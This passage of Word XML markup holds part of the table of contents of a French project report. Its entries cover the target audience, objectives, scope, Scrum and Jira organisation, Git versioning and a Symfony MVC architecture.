          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E9079BB" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817726" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.2 Public cible</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817726 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="679ADD76" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817727" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>.3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Objectifs du projet</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817727 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B2EF29A" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817728" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.4 Périmètre du projet (limites)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817728 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="131DC5A8" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817729" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>2.5 Contraintes identifiées</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817729 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78346AFC" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817730" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3. ORGANISATION DU TRAVAIL</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817730 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0DF94527" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817731" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1 Méthode de gestion de projet</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817731 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2EDEA988" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817732" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Une organisation inspirée de Scrum</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817732 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F1AA15F" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817733" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Un backlog de tâches géré dans Jira</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817733 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BAD809F" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817734" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Suivi de l'avancement</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817734 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A2C15B3" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817735" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2 Versionnage du code</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817735 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="484947DF" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817736" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Git et gestion des branches</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817736 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E5719AB" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817737" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Une stratégie de commits liée aux tickets</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817737 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E807EED" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817738" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Plateforme et sauvegarde</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817738 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="129220B8" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817739" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4. ENVIRONNEMENT TECHNIQUE</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817739 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AFDE56D" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817740" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.1 Environnement de développement</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817740 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="49572B03" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817741" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>4.2 Architecture générale du projet</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817741 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3019F692" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817742" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Une architecture MVC monolithique avec Symfony</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817742 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F1508C4" w14:textId="77777777" w:rsidR="00C65F1A" w:rsidRDefault="00C65F1A">
      <w:pPr>
        <w:pStyle w:val="TM3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc233817743" w:history="1">
        <w:r w:rsidRPr="009F1416">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Pourquoi ce choix</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc233817743 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
